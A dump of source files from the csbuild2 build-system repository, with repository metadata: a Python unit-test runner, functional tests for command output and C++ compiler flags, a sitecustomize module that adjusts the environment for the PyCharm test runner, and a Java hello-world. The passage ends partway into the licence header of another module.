"content_id": "a3978ded8f75c4d3d584ae1734cab82ffb1193cb", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4116, "license_type": "permissive", "max_line_length": 122, "num_lines": 115, "path": "/csbuild/_testing/run_unit_tests.py", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "# Copyright (C) 
2013 Jaedyn K. Draper\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\"\"\"\n.. module:: run_unit_tests\n\t:synopsis: Import this file and call RunTests() to run csbuild's unit tests.\n\t\tEnsure cwd is one directory above the csbuild package. Do not execute directly, it will fail.\n\"\"\"\n\nfrom __future__ import unicode_literals, division, print_function\n\nimport sys\nimport unittest\nimport fnmatch\nimport os\nimport imp\n\nfrom .. import log\nfrom .._utils import shared_globals, terminfo\nfrom .._testing import testcase\n\n\ndef RunTests(include, exclude):\n\t\"\"\"\n\tRun all unit tests.\n\tMust be executed with current working directory being a directory that contains the csbuild package.\n\n\t:param include: Filters to be the only things built\n\t:type include: list[str]\n\t:param exclude: Filters to not build\n\t:type exclude: list[str]\n\t:return: 0 if successful, 1 if not\n\t:rtype: int\n\t\"\"\"\n\tshared_globals.colorSupported = terminfo.TermInfo.SupportsColor()\n\tshared_globals.showCommands = True\n\ttests = unittest.defaultTestLoader.discover(\"csbuild\", \"*.py\", \".\")\n\tfor testdir in os.listdir(\"functional_tests\"):\n\t\tlog.Test(\"Loading functional tests from {}\", testdir)\n\t\tif os.path.isdir(os.path.join(\"functional_tests\", testdir)):\n\t\t\tmodulepath = os.path.join(\"functional_tests\", testdir, \"tests.py\")\n\t\t\tif os.access(modulepath, os.F_OK):\n\t\t\t\tlog.Test(\"Loading {}\", modulepath)\n\t\t\t\ttests.addTest(unittest.defaultTestLoader.loadTestsFromModule(imp.load_source(\"{}_TESTS\".format(testdir), modulepath)))\n\ttestRunner = testcase.TestRunner(xmlfile=\"result.xml\", stream=sys.stdout, verbosity=0)\n\n\t# Handle filtering:\n\t# 1) If include has any contents, remove any tests that don't match it\n\t# 2) Remove any tests that do match the exclude filter\n\t# 3) Finally, reorder the pylint test to be last in line because it is slow.\n\tpylinttest = None\n\tfor test in tests:\n\t\t# pylint: disable=protected-access\n\t\tfor test2 in test._tests:\n\t\t\tdelIndexes = []\n\t\t\t# pylint: disable=protected-access\n\t\t\ttry:\n\t\t\t\tfor idx, test3 in enumerate(test2._tests):\n\t\t\t\t\t# pylint: disable=protected-access\n\t\t\t\t\tbaseId = test3.id().rsplit('.', 2)[1]\n\t\t\t\t\tsimpleTestId = \"{}.{}\".format(baseId, test3._testMethodName)\n\t\t\t\t\tmatch = True\n\t\t\t\t\tif include:\n\t\t\t\t\t\tmatch = False\n\t\t\t\t\t\tfor inc in include:\n\t\t\t\t\t\t\tif fnmatch.fnmatch(simpleTestId, inc):\n\t\t\t\t\t\t\t\tmatch = 
True\n\t\t\t\t\t\tif not match:\n\t\t\t\t\t\t\tlog.Test(\"Excluding test {} due to no include match\", simpleTestId)\n\t\t\t\t\t\t\tdelIndexes.append(idx)\n\t\t\t\t\t\t\tcontinue\n\t\t\t\t\tfor exc in exclude:\n\t\t\t\t\t\tmatch = True\n\t\t\t\t\t\tif fnmatch.fnmatch(simpleTestId, exc):\n\t\t\t\t\t\t\tlog.Test(\"Excluding test {} due to exclude match\", simpleTestId)\n\t\t\t\t\t\t\tdelIndexes.append(idx)\n\t\t\t\t\t\t\tmatch = False\n\t\t\t\t\t\t\tbreak\n\n\t\t\t\t\tif not match:\n\t\t\t\t\t\tcontinue\n\n\t\t\t\t\tif baseId == \"TestPylint\":\n\t\t\t\t\t\tassert pylinttest is None\n\t\t\t\t\t\tpylinttest = test3\n\t\t\t\t\t\tdelIndexes.append(idx)\n\t\t\texcept AttributeError:\n\t\t\t\tcontinue\n\n\t\t\tfor idx in reversed(delIndexes):\n\t\t\t\t# pylint: disable=protected-access\n\t\t\t\tdel test2._tests[idx]\n\n\tif pylinttest is not None:\n\t\ttests.addTest(pylinttest)\n\n\tresult = testRunner.run(tests)\n\treturn 0 if result.wasSuccessful() else 1\n" }, { "alpha_fraction": 0.7454686760902405, "alphanum_fraction": 0.7501294612884521, "avg_line_length": 33.1769905090332, "blob_id": "0b9dfed771547d2dc0d371daa072b6ee6cf6906f", "content_id": "873273d285f6d701fbc70b4b2d089504415a3f39", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3862, "license_type": "no_license", "max_line_length": 106, "num_lines": 113, "path": "/functional_tests/no_interleaved_output_test/tests.py", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "# Copyright (C) 2016 Jaedyn K. Draper\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\"\"\"\n.. module:: tests\n\t:synopsis: Test that output from multiple commands run at once is not interleaved\n\n.. moduleauthor:: Jaedyn K. Draper\n\"\"\"\n\nfrom __future__ import unicode_literals, division, print_function\n\nimport sys\nimport threading\n\nfrom csbuild._testing.functional_test import FunctionalTest\nfrom csbuild import commands, log\nfrom csbuild._utils import queue\n\n# Pay no attention to the unit test behind the curtain.\n# This test isn't really a functional test like the others.\n# It's a unit test of commands.Run()\n# However, given the way that needs to be tested, launching processes and checking output and return code,\n# the test fits the functional test pattern better than the unit test pattern, so it's being shoehorned\n# into a different place. 
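It spawns ten threads that each run print_some_stuff.py through\n# commands.Run() and then verifies that each process's digits reach the log as one\n# contiguous, un-interleaved block. 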
Pay it no mind!\nclass NoInterleavedOutputTest(FunctionalTest):\n\t\"\"\"Ensure no interleaved output from commands\"\"\"\n\t# pylint: disable=invalid-name\n\tdef setUp(self): #pylint: disable=arguments-differ\n\t\tself.lastValue = -1\n\t\tself.numTallies = 0\n\t\tself.callbackQueue = queue.Queue()\n\n\t\t#overriding stdout rather than specifying a callback\n\t\t#because callbacks are called in realtime, stdout printing is queued\n\t\t#this test is testing the latter, that the queueing works properly\n\t\tself.oldLogStdout = log.Stdout\n\t\tlog.Stdout = self._stdoutOverride\n\n\t\tFunctionalTest.setUp(self, cleanAtEnd=False)\n\n\tdef tearDown(self):\n\t\tlog.Stdout = self.oldLogStdout\n\t\tFunctionalTest.tearDown(self)\n\n\tdef _stdoutOverride(self, msg):\n\t\tself.oldLogStdout(\" {}\".format(msg))\n\t\tvalue = int(msg)\n\t\tself.numTallies += 1\n\t\tself.assertTrue(value == self.lastValue + 1 or (value == 0 and self.lastValue == 9))\n\t\tself.lastValue = value\n\n\tdef RunMakeAndTally(self):\n\t\t\"\"\"\n\t\tRun the local makefile, tally the output to ensure it's not interleaved\n\t\t\"\"\"\n\n\t\tcmd = [sys.executable, \"print_some_stuff.py\"]\n\n\t\treturncode, _, _ = commands.Run(cmd)\n\t\tself.assertEqual(returncode, 0)\n\t\tself.callbackQueue.Put(commands.stopEvent)\n\n\tdef test(self):\n\t\t\"\"\"Ensure no interleaved output from commands\"\"\"\n\t\tcommands.queueOfLogQueues = queue.Queue()\n\t\toutputThread = threading.Thread(target=commands.PrintStaggeredRealTimeOutput)\n\t\toutputThread.start()\n\n\t\tthreads = [threading.Thread(target=self.RunMakeAndTally) for _ in range(10)]\n\n\t\tlog.SetCallbackQueue(self.callbackQueue)\n\n\t\tfor thread in threads:\n\t\t\tthread.start()\n\n\t\tstopped = 0\n\t\twhile True:\n\t\t\tcallback = self.callbackQueue.GetBlocking()\n\n\t\t\tif callback is commands.stopEvent:\n\t\t\t\tstopped += 1\n\t\t\t\tif stopped == len(threads):\n\t\t\t\t\tbreak\n\t\t\t\tcontinue\n\t\t\tcallback()\n\n\t\tfor thread in threads:\n\t\t\tthread.join()\n\n\t\tcommands.queueOfLogQueues.Put(commands.stopEvent)\n\t\toutputThread.join()\n\n\t\tlog.SetCallbackQueue(None)\n\t\tself.assertEqual(self.lastValue, 9)\n\t\tself.assertEqual(self.numTallies, len(threads) * 10)\n" }, { "alpha_fraction": 0.7104772329330444, "alphanum_fraction": 0.7147650718688965, "avg_line_length": 30.186046600341797, "blob_id": "418eaa820e928a583c3b68bd1231017adb4a88fe", "content_id": "71d18f379ed3409adc9b42c371e8552d10ae2595", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5364, "license_type": "no_license", "max_line_length": 108, "num_lines": 172, "path": "/sitecustomize.py", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "# Copyright (C) 2017 Jaedyn K. 
Draper\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\"\"\"\n.. module:: sitecustomize\n\t:synopsis: Hacky stuff for getting pycharm test runners to work\n\n.. moduleauthor:: Jaedyn K. Draper\n\"\"\"\n\nfrom __future__ import unicode_literals, division, print_function\n\nimport os\nimport sys\n\n# Copied from csbuild._utils because we can't import that before we set environ, and we need this to do that\nif sys.version_info[0] >= 3:\n\tdef PlatformString(inputStr):\n\t\t\"\"\"\n\t\tIn the presence of unicode_literals, get an object that is type str in both python2 and python3.\n\t\t:return: str representation of inputStr\n\t\t:rtype: str\n\t\t\"\"\"\n\t\tif isinstance(inputStr, str):\n\t\t\treturn inputStr\n\t\treturn inputStr.decode(\"UTF-8\")\nelse:\n\tdef PlatformString(inputStr):\n\t\t\"\"\"\n\t\tIn the presence of unicode_literals, get an object that is type str in both python2 and python3.\n\t\t:return: str representation of inputStr\n\t\t:rtype: str\n\t\t\"\"\"\n\t\tif isinstance(inputStr, str):\n\t\t\treturn inputStr\n\t\treturn inputStr.encode(\"UTF-8\")\n\nedit_done = False\n\n\ndef PathHook(_):\n\t\"\"\"\n\tHacks around some stuff to make sure things are properly set up when running with jetbrains test runner\n\tinstead of run_unit_tests.py\n\t\"\"\"\n\tglobal edit_done\n\tif edit_done:\n\t\traise ImportError\n\ttry:\n\t\targv = sys.argv\n\texcept AttributeError:\n\t\tpass\n\telse:\n\t\tedit_done = True\n\t\tisTestRunner = False\n\t\tif argv[0].endswith(\"pydevd.py\"):\n\t\t\tfor arg in argv:\n\t\t\t\tif arg.endswith('_jb_unittest_runner.py'):\n\t\t\t\t\tisTestRunner = True\n\t\t\t\t\tbreak\n\t\telif argv[0].endswith('_jb_unittest_runner.py'):\n\t\t\tisTestRunner = True\n\n\t\tif isTestRunner:\n\t\t\timport signal\n\n\t\t\tdef _exitsig(sig, _):\n\t\t\t\tfrom csbuild import log\n\t\t\t\tif sig == signal.SIGINT:\n\t\t\t\t\tlog.Error(\"Keyboard interrupt received. Aborting test run.\")\n\t\t\t\telse:\n\t\t\t\t\tlog.Error(\"Received terminate signal. 
Aborting test run.\")\n\t\t\t\tos._exit(sig) # pylint: disable=protected-access\n\n\t\t\tsignal.signal(signal.SIGINT, _exitsig)\n\t\t\tsignal.signal(signal.SIGTERM, _exitsig)\n\n\t\t\tos.environ[PlatformString(\"CSBUILD_RUNNING_THROUGH_PYTHON_UNITTEST\")] = PlatformString(\"1\")\n\t\t\tos.environ[PlatformString(\"CSBUILD_NO_AUTO_RUN\")] = PlatformString(\"1\")\n\t\t\tsys.path.insert(0, os.path.dirname(os.path.abspath(__file__)))\n\t\t\tos.environ[PlatformString(\"PYTHONPATH\")] = os.pathsep.join(sys.path)\n\t\t\tos.chdir(os.path.dirname(os.path.abspath(__file__)))\n\n\traise ImportError # let the real import machinery do its work\n\n\nsys.path_hooks[:0] = [PathHook]\n\ndef EnableResourceWarningStackTraces():\n\t\"\"\"\n\tCalling this function patches the open() function to collect tracebacks, which will get printed\n\tif a ResourceWarning is thrown.\n\t\"\"\"\n\tfrom io import FileIO as _FileIO\n\timport _pyio\n\timport builtins # pylint: disable=import-error\n\timport linecache\n\timport traceback\n\timport tracemalloc # pylint: disable=import-error\n\timport warnings\n\n\tdef WarnUnclosed(obj, delta=1):\n\t\t\"\"\"Warns when unclosed files are detected\"\"\"\n\t\tdelta += 1\n\t\ttrace = tracemalloc.get_object_traceback(obj)\n\t\tif trace is None:\n\t\t\treturn\n\t\ttry:\n\t\t\twarnings.warn(\"unclosed %r\" % obj, ResourceWarning, delta + 1) # pylint: disable=undefined-variable\n\t\t\tprint(\"Allocation traceback (most recent first):\")\n\t\t\tfor frame in trace:\n\t\t\t\tprint(\" File %r, line %s\" % (frame.filename, frame.lineno))\n\t\t\t\tline = linecache.getline(frame.filename, frame.lineno)\n\t\t\t\tline = line.strip()\n\t\t\t\tif line:\n\t\t\t\t\tprint(\" %s\" % line)\n\n\t\t\tframe = sys._getframe(delta) # pylint: disable=protected-access\n\t\t\ttrace = traceback.format_stack(frame)\n\t\t\tprint(\"Destroy traceback (most recent last):\")\n\t\t\tfor line in trace:\n\t\t\t\tsys.stdout.write(line)\n\t\t\tsys.stdout.flush()\n\t\tfinally:\n\t\t\tobj.close()\n\n\n\tclass MyFileIO(_FileIO):\n\t\t\"\"\"Override for fileio that detects file leaks\"\"\"\n\t\tdef __init__(self, *args, **kw):\n\t\t\t_FileIO.__init__(self, *args, **kw)\n\t\t\ttrace = tracemalloc.get_object_traceback(self)\n\t\t\tif trace is None:\n\t\t\t\traise RuntimeError(\"tracemalloc is disabled\")\n\n\t\tdef __del__(self):\n\t\t\tif not self.closed:\n\t\t\t\tWarnUnclosed(self)\n\t\t\tif hasattr(_FileIO, '__del__'):\n\t\t\t\t_FileIO.__del__(self)\n\n\n\tdef PatchOpen():\n\t\t\"\"\"Patch the open function to detect file leaks\"\"\"\n\t\t# Already patched\n\t\tif _pyio.FileIO is MyFileIO:\n\t\t\treturn\n\n\t\t# _io.open() uses a hardcoded reference to _io.FileIO\n\t\t# use _pyio.open(), which looks up FileIO in the _pyio namespace\n\t\t_pyio.FileIO = MyFileIO\n\t\tbuiltins.open = _pyio.open\n\n\ttracemalloc.start(25)\n\tPatchOpen()\n" }, { "alpha_fraction": 0.6499999761581421, "alphanum_fraction": 0.6499999761581421, "avg_line_length": 10.851851463317871, "blob_id": "f2b891a72236465984ca05ea152b965", "content_id": "7f7924d2f5307663b4a6de1b49ffd3e298179e78", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 320, "license_type": "no_license", "max_line_length": 39, "num_lines": 27, "path": "/functional_tests/basic_java_test/hello_world/hello.java", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "package com.sleepingcat;\n\n// Hello world test program\nclass HelloWorld\n{\n\t// A nested test class\n\tpublic class OtherTest\n\t{\n\t\tpublic 
void test()\n\t\t{\n\t\t}\n\t}\n\n\t// Entry point\n\tpublic static void main(String[] args)\n\t{\n\t\tSystem.out.printf(\"Hello, world!\");\n\t}\n}\n\n// Some test class\nclass Test\n{\n\tpublic void test()\n\t{\n\t}\n}\n" }, { "alpha_fraction": 0.719809353351593, "alphanum_fraction": 0.722950279712677, "avg_line_length": 46.348716735839844, "blob_id": "f9a878f7f9b8ac6f00498ed7803ff4b37ab53539", "content_id": "0ef6011e8f64a3c5b1b14a895c684c80e471e1fa", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 9233, "license_type": "no_license", "max_line_length": 138, "num_lines": 195, "path": "/functional_tests/cpp_features_test/tests.py", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "# Copyright (C) 2016 Jaedyn K. Draper\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\"\"\"\n.. module:: tests\n\t:synopsis: Basic test of C++ tools\n\n.. moduleauthor:: Jaedyn K. 
Draper\n\"\"\"\n\nfrom __future__ import unicode_literals, division, print_function\n\nimport unittest\n\nfrom csbuild._testing.functional_test import FunctionalTest\nfrom csbuild._utils import PlatformBytes\n\nimport os\nimport platform\nimport re\nimport subprocess\n\nclass CppFeaturesTest(FunctionalTest):\n\t\"\"\"C++ features test\"\"\"\n\n\tExplicitDefineIsPresent = \"Explicit define is present\"\n\tImplicitDefineIsPresent = \"Implicit define is present\"\n\tNoExplicitDefine = \"No explicit define\"\n\tNoImplicitDefine = \"No implicit define\"\n\n\t# pylint: disable=invalid-name\n\tdef setUp(self): # pylint: disable=arguments-differ\n\t\tif platform.system() == \"Windows\":\n\t\t\tself.outputFile = \"out/hello_world.exe\"\n\t\telse:\n\t\t\tself.outputFile = \"out/hello_world\"\n\t\tFunctionalTest.setUp(self)\n\n\tdef testSetCcLanguageStandard(self):\n\t\t\"\"\"Test that the correct compiler options are being set.\"\"\"\n\t\tself.cleanArgs = [\"--project=cc_standard\"]\n\t\t_, out, _ = self.assertMakeSucceeds(\"--show-commands\", \"--project=cc_standard\")\n\n\t\t# MSVC doesn't have a setting for the C language standard.\n\t\tif platform.system() != \"Windows\":\n\t\t\tself.assertIsNot(re.compile(R\"-std=c11\\s\", re.M).search(out), None)\n\n\t\tself.assertTrue(os.access(self.outputFile, os.F_OK))\n\t\tout = subprocess.check_output([self.outputFile])\n\n\t\tself.assertEqual(out, PlatformBytes(\"Hello, world!\"))\n\n\tdef testSetCxxLanguageStandard(self):\n\t\t\"\"\"Test that the correct compiler options are being set.\"\"\"\n\t\tself.cleanArgs = [\"--project=cxx_standard\"]\n\t\t_, out, _ = self.assertMakeSucceeds(\"--show-commands\", \"--project=cxx_standard\")\n\n\t\tif platform.system() == \"Windows\":\n\t\t\tself.assertIsNot(re.compile(R\"/std:c\\+\\+14\\s\", re.M).search(out), None)\n\t\telse:\n\t\t\tself.assertIsNot(re.compile(R\"-std=c\\+\\+14\\s\", re.M).search(out), None)\n\n\t\tself.assertTrue(os.access(self.outputFile, os.F_OK))\n\t\tout = subprocess.check_output([self.outputFile])\n\n\t\tself.assertEqual(out, PlatformBytes(\"Hello, world!\"))\n\n\[email protected](platform.system() == \"Windows\", \"Incremental linking is only available on the MSVC linker\")\n\tdef testIncrementalLink(self):\n\t\t\"\"\"Test that incremental linking is enabled and generating an ILK file.\"\"\"\n\t\tself.cleanArgs = [\"--project=incremental_linking\", \"-o=msvc\"]\n\t\t_, out, _ = self.assertMakeSucceeds(\"--show-commands\", \"--project=incremental_linking\", \"-o=msvc\")\n\n\t\tilkFilePath = \"{}.ilk\".format(os.path.splitext(self.outputFile)[0])\n\n\t\tself.assertIsNot(re.compile(R\"/INCREMENTAL\\s\", re.M).search(out), None)\n\t\tself.assertIsNot(re.compile(R\"/ILK:\", re.M).search(out), None)\n\n\t\tself.assertFileExists(self.outputFile)\n\t\tself.assertFileExists(ilkFilePath)\n\n\t\tout = subprocess.check_output([self.outputFile])\n\n\t\tself.assertEqual(out, PlatformBytes(\"Hello, world!\"))\n\n\tdef testDisableSymbolsDisableOptDynamicReleaseRuntime(self):\n\t\t\"\"\"Test that the correct compiler options are being set.\"\"\"\n\t\tself.cleanArgs = [\"--project=hello_world\", \"--target=nosymbols_noopt_dynamic_release\"]\n\t\t_, out, _ = self.assertMakeSucceeds(\"--show-commands\", \"--project=hello_world\", \"--target=nosymbols_noopt_dynamic_release\")\n\n\t\tif platform.system() == \"Windows\":\n\t\t\tself.assertIs(re.compile(R\"/Z7\\s|/Zi\\s|/ZI\\s\", re.M).search(out), None)\n\t\t\tself.assertIsNot(re.compile(R\"/Od\\s\", re.M).search(out), 
None)\n\t\t\tself.assertIsNot(re.compile(R\"/MD\\s\", re.M).search(out), None)\n\t\t\tself.assertIsNot(re.compile(R\"/DIMPLICIT_DEFINE\\s\", re.M).search(out), None)\n\t\telse:\n\t\t\tself.assertIs(re.compile(R\"-g\\s\", re.M).search(out), None)\n\t\t\tself.assertIsNot(re.compile(R\"-O0\\s\", re.M).search(out), None)\n\n\t\tself.assertTrue(os.access(self.outputFile, os.F_OK))\n\t\tout = subprocess.check_output([self.outputFile])\n\n\t\tself.assertEqual(out, PlatformBytes(\"{} - {}\".format(CppFeaturesTest.NoExplicitDefine, CppFeaturesTest.ImplicitDefineIsPresent)))\n\n\tdef testEmbeddedSymbolsSizeOptStaticReleaseRuntime(self):\n\t\t\"\"\"Test that the correct compiler options are being set.\"\"\"\n\t\tself.cleanArgs = [\"--project=hello_world\", \"--target=embeddedsymbols_sizeopt_static_release\"]\n\t\t_, out, _ = self.assertMakeSucceeds(\"--show-commands\", \"--project=hello_world\", \"--target=embeddedsymbols_sizeopt_static_release\")\n\n\t\tif platform.system() == \"Windows\":\n\t\t\tself.assertIsNot(re.compile(R\"/Z7\\s\", re.M).search(out), None)\n\t\t\tself.assertIsNot(re.compile(R\"/O1\\s\", re.M).search(out), None)\n\t\t\tself.assertIsNot(re.compile(R\"/MT\\s\", re.M).search(out), None)\n\t\t\tself.assertIsNot(re.compile(R\"/DIMPLICIT_DEFINE\\s\", re.M).search(out), None)\n\t\t\tself.assertIsNot(re.compile(R\"/DEXPLICIT_DEFINE\\s\", re.M).search(out), None)\n\t\telse:\n\t\t\tself.assertIsNot(re.compile(R\"-g\\s\", re.M).search(out), None)\n\t\t\tself.assertIsNot(re.compile(R\"-Os\\s\", re.M).search(out), None)\n\n\t\tself.assertTrue(os.access(self.outputFile, os.F_OK))\n\t\tout = subprocess.check_output([self.outputFile])\n\n\t\tself.assertEqual(out, PlatformBytes(\"{} - {}\".format(CppFeaturesTest.ExplicitDefineIsPresent, CppFeaturesTest.ImplicitDefineIsPresent)))\n\n\tdef testExternalSymbolsSpeedOptDynamicDebugRuntime(self):\n\t\t\"\"\"Test that the correct compiler options are being set.\"\"\"\n\t\tself.cleanArgs = [\"--project=hello_world\", \"--target=externalsymbols_speedopt_dynamic_debug\"]\n\t\t_, out, _ = self.assertMakeSucceeds(\"--show-commands\", \"--project=hello_world\", \"--target=externalsymbols_speedopt_dynamic_debug\")\n\n\t\tif platform.system() == \"Windows\":\n\t\t\tself.assertIsNot(re.compile(R\"/Zi\\s\", re.M).search(out), None)\n\t\t\tself.assertIsNot(re.compile(R\"/O2\\s\", re.M).search(out), None)\n\t\t\tself.assertIsNot(re.compile(R\"/MDd\\s\", re.M).search(out), None)\n\t\t\tself.assertIsNot(re.compile(R\"/DIMPLICIT_DEFINE\\s\", re.M).search(out), None)\n\t\t\tself.assertIsNot(re.compile(R\"/UIMPLICIT_DEFINE\\s\", re.M).search(out), None)\n\t\telif platform.system() == \"Linux\":\n\t\t\tself.assertIsNot(re.compile(R\"-g\\s\", re.M).search(out), None)\n\t\t\tself.assertIsNot(re.compile(R\"-Ofast\\s\", re.M).search(out), None)\n\n\t\tself.assertTrue(os.access(self.outputFile, os.F_OK))\n\t\tout = subprocess.check_output([self.outputFile])\n\n\t\tself.assertEqual(out, PlatformBytes(\"{} - {}\".format(CppFeaturesTest.NoExplicitDefine, CppFeaturesTest.NoImplicitDefine)))\n\n\tdef testExternalPlusSymbolsMaxOptStaticDebugRuntime(self):\n\t\t\"\"\"Test that the correct compiler options are being set.\"\"\"\n\t\tself.cleanArgs = [\"--project=hello_world\", \"--target=externalplussymbols_maxopt_static_debug\"]\n\t\t_, out, _ = self.assertMakeSucceeds(\"--show-commands\", \"--project=hello_world\", \"--target=externalplussymbols_maxopt_static_debug\")\n\n\t\tif platform.system() == \"Windows\":\n\t\t\tself.assertIsNot(re.compile(R\"/ZI\\s\", re.M).search(out), 
None)\n\t\t\tself.assertIsNot(re.compile(R\"/Ox\\s\", re.M).search(out), None)\n\t\t\tself.assertIsNot(re.compile(R\"/MTd\\s\", re.M).search(out), None)\n\t\t\tself.assertIsNot(re.compile(R\"/DIMPLICIT_DEFINE\\s\", re.M).search(out), None)\n\t\t\tself.assertIsNot(re.compile(R\"/DEXPLICIT_DEFINE\\s\", re.M).search(out), None)\n\t\t\tself.assertIsNot(re.compile(R\"/UIMPLICIT_DEFINE\\s\", re.M).search(out), None)\n\t\telif platform.system() == \"Linux\":\n\t\t\tself.assertIsNot(re.compile(R\"-g\\s\", re.M).search(out), None)\n\t\t\tself.assertIsNot(re.compile(R\"-O3\\s\", re.M).search(out), None)\n\n\t\tself.assertTrue(os.access(self.outputFile, os.F_OK))\n\t\tout = subprocess.check_output([self.outputFile])\n\n\t\tself.assertEqual(out, PlatformBytes(\"{} - {}\".format(CppFeaturesTest.ExplicitDefineIsPresent, CppFeaturesTest.NoImplicitDefine)))\n\n\tdef testCustomOptions(self):\n\t\t\"\"\"Test that the correct compiler options are being set.\"\"\"\n\t\tself.cleanArgs = [\"--project=hello_world\", \"--target=custom_options\"]\n\t\t_, out, err = self.assertMakeSucceeds(\"--show-commands\", \"--project=hello_world\", \"--target=custom_options\")\n\n\t\tif platform.system() == \"Windows\":\n\t\t\tself.assertIsNot(re.compile(R\"/W4\\s\", re.M).search(out), None)\n\t\t\tself.assertIsNot(re.compile(R\"/STACK:1048576\\s\", re.M).search(out), None)\n\t\t\tself.assertIn(\"warning C4101: 'unused': unreferenced local variable\", out)\n\t\telse:\n\t\t\tself.assertIsNot(re.compile(R\"-Wunused-variable\\s\", re.M).search(out), None)\n\t\t\tself.assertIsNot(re.compile(R\"-shared-libgcc\\s\", re.M).search(out), None)\n\t\t\tself.assertIsNot(re.compile(R\"warning: unused variable .unused. \\[-Wunused-variable\\]\").search(err), None)\n" }, { "alpha_fraction": 0.7012463808059692, "alphanum_fraction": 0.7066953182220459, "avg_line_length": 36.47965621948242, "blob_id": "53403d76c4399b5fcd22c74e230dfabd8aa82d5a", "content_id": "ec7ba8888bb835a93f8073c54ff607a2d866cfe1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 47899, "license_type": "no_license", "max_line_length": 189, "num_lines": 1278, "path": "/csbuild/_build/__init__.py", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "# Copyright (C) 2013 Jaedyn K. Draper\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following 